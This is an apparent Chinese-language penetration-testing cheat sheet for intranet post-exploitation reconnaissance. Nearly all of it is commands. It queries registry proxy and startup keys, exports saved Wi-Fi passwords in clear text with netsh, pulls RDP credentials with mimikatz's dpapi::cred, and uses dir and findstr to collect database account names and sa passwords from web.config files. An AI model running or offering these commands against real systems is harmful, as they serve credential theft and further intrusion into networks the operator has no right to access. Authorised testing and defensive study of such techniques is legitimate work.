内网渗透-注册表信息搜集
Powershell注册表搜集
https://github.com/3gstudent/ListInstalledPrograms
获取系统代理:
reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
获取启动项
reg query HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
获取wifi密码
netsh wlan export profile interface=WLAN(看实际情况) key=clear folder=C:\
mimikatz导出RDP密码
mimikatz 的 dpapi::cred
在根目录运行
dir /b /s web.config >> tmps.logs
根据上面已知的数据库连接账号密码字段名,我们就可以直接利用 findstr 在指定的 web 目录下批量抓取 sa 密码
findstr /c:"User Id=" /c:"Password=" /si web.config >> C:/inetpub/tmps.logs